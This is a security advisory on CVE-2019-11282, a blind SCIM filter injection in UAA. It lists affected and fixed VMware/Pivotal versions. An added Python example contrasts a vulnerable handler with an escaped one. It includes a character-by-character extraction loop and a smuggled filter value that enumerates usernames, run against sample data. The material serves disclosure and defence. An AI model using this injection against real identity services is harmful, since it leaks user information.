CVE-2019-11282: UAA is vulnerable to a Blind SCIM injection leading to information disclosure
Severity
Medium
Vendor
Pivotal
Description
VMware Tanzu Application Service for VMs versions prior to 2.8.0, Operations Manager versions prior to 2.8.0, and Pivotal Container Service versions prior to 1.7.0 ship a vulnerable version of UAA. That UAA exposes an endpoint that incorporates request content into a SCIM query without neutralising it, so a remote, authenticated user holding the scim.invite scope can craft a request whose content is interpreted as SCIM filter syntax. The injection is blind: the response does not return query results directly, but its outcome still leaks information about the users stored in the UAA.
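As an added example (not code from this advisory, from UAA or from Cloud Foundry), the following Python sketches the class of bug described above: a handler splices caller-supplied input into a SCIM filter by string concatenation, the endpoint answers only yes or no, and a caller holding the required scope turns that into a blind oracle that recovers usernames one character at a time. The affected endpoint, the filter template `emails eq "<input>"`, the miniature filter evaluator and the sample directory are all assumptions made for illustration and are not taken from UAA. The hardened handler renders the input as a SCIM string literal, escaping backslash and double quote as the RFC 7644 filter grammar requires, so the input can never become filter syntax.

```python
"""Blind SCIM-filter injection, vulnerable vs. hardened construction (illustrative, not UAA code)."""
import re

# Constructed sample directory. Real SCIM users carry a multi-valued "emails" attribute;
# it is collapsed to one string here to keep the evaluator small.
USERS = [
    {"userName": "admin", "emails": "admin@corp.example"},
    {"userName": "bob", "emails": "bob@corp.example"},
]

# A quoted string (with \" and \\ escapes, as in the RFC 7644 filter grammar) or a bare word.
_TOKEN = re.compile(r'"((?:[^"\\]|\\.)*)"|(\S+)')


def tokenize(filt):
    """Split a filter into ("str", value) and ("word", text) tokens, unescaping string literals."""
    tokens = []
    for m in _TOKEN.finditer(filt):
        if m.group(1) is not None:
            tokens.append(("str", re.sub(r"\\(.)", r"\1", m.group(1))))
        else:
            tokens.append(("word", m.group(2)))
    return tokens


def _match(user, attr, op, value):
    actual = str(user.get(attr, "")).lower()
    value = value.lower()
    if op == "eq":
        return actual == value
    if op == "sw":
        return actual.startswith(value)
    if op == "co":
        return value in actual
    raise ValueError(f"unsupported operator {op!r}")


def evaluate(filt, user):
    """Evaluate: term (("and"|"or") term)*, term = attr op "value"; "and" binds tighter than "or"."""
    toks = tokenize(filt)
    groups = [[]]  # disjunction of conjunctions
    i = 0
    while True:
        if i + 3 > len(toks):
            raise ValueError("malformed filter")
        (k1, attr), (k2, op), (k3, value) = toks[i:i + 3]
        if (k1, k2, k3) != ("word", "word", "str"):
            raise ValueError("malformed filter")
        groups[-1].append(_match(user, attr, op, value))
        i += 3
        if i == len(toks):
            return any(all(g) for g in groups)
        kind, conj = toks[i]
        if kind != "word" or conj.lower() not in ("and", "or"):
            raise ValueError("malformed filter")
        if conj.lower() == "or":
            groups.append([])
        i += 1


def search(filt):
    return [u for u in USERS if evaluate(filt, u)]


def invite_vulnerable(email):
    """Assumed vulnerable handler: the caller's input is spliced into filter syntax, and the
    endpoint reveals only whether the lookup matched, which is all a blind attacker needs."""
    return bool(search(f'emails eq "{email}"'))


def scim_quote(value):
    """Render a value as a SCIM filter string literal: escape backslash and double quote."""
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def invite_hardened(email):
    """Same lookup, but the input can only ever be the contents of one string literal."""
    return bool(search("emails eq " + scim_quote(email)))


def extract_username(oracle, alphabet="abcdefghijklmnopqrstuvwxyz", max_len=32):
    """Recover a userName that extends the guessed prefix, one character per round, using only
    the yes/no answer of the invite endpoint (the "blind" part of the injection)."""
    found = ""
    while len(found) < max_len:
        for c in alphabet:
            # Closes the attacker-controlled literal, then appends a probe clause; the template's
            # own trailing quote closes the probe's string.
            if oracle(f'nobody@corp.example" or userName sw "{found + c}'):
                found += c
                break
        else:
            break
    return found


if __name__ == "__main__":
    print("vulnerable leaks:", extract_username(invite_vulnerable))
    print("hardened leaks:", repr(extract_username(invite_hardened)))
```

Against the constructed directory, the vulnerable handler lets the probe loop recover the username `admin` without ever seeing a user record, while the hardened handler answers no to every probe. In a real service, escaping should sit behind an allow-list on the shape of the input (a single email address contains no quote or backslash), and because the leak is blind, detection has to look at requests rather than responses: filter metacharacters such as `"` and the words `or` / `sw` inside an invitation's email field are the signal.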
Affected VMware Products and Versions
Severity is medium unless otherwise noted.
- Operations Manager
  - All versions prior to 2.8.0
- Pivotal Container Service (PKS)
  - All versions prior to 1.7.0
- VMware Tanzu Application Service for VMs
  - All versions prior to 2.8.0
Mitigation
Users of affected versions should upgrade to a fixed release; this advisory lists no other mitigation. Releases that have fixed this issue include:
- Operations Manager
  - 2.8.0
- Pivotal Container Service (PKS)
  - 1.7.0
- VMware Tanzu Application Service for VMs
  - 2.8.0
Credit
Amit Laish - GE Digital Cyber Security Team
References
- https://www.cloudfoundry.org/blog/cve-2019-11282/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-11282
History
2020-04-06: Initial vulnerability report published.